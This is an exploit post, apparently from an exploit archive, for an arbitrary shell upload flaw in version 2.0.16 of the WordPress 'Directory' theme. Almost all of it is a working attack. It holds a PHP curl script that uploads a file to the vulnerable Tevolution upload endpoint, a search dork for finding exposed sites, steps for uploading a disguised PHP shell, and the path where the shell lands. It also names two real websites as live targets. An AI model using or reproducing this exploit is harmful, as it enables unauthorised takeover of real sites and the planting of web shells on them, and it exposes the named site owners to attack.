WordPress Theme Directory 2.0.16 Shell Upload

`######################  
# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability  
# Exploit Author : xBADGIRL21  
# Dork : inurl:/wp-content/themes/Directory/  
# Vendor Homepage : https://templatic.com/  
# version : 2.0.16 - 2.0.14 & maybe high or lower  
# Tested on: [ BackBox ]  
# skype:xbadgirl21  
# Date: 15/08/2016  
# video Proof : https://youtu.be/eVjW6rnaoSY  
######################  
# [+] USAGE :  
######################  
# 1.- Download or Copy the Exploit C0des  
# 2.- Use Dork and Choose One Of the Website  
# 3.- Edit The Script  
# 4.- Upload Your File : shell.php.jpg or shell.php.txt  
######################  
# [+] Exploit:  
######################  
<?php  
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean  
you are the Founder or Owner of this ^_^  
$ch = curl_init("  
http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php  
");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('file'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
######################  
# [+] Dev!l Path :  
######################  
#  
http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt  
######################  
# [+] Live Demo :  
######################  
# http://guiagronicaragua.com/wp-content/themes/Directory/  
# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/  
######################  
# Discovered by : xBADGIRL21 - Unkn0wN  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't  
Want me to Write His Name  
# so I Just Write the Exploit C0des ...........  
#######################  
`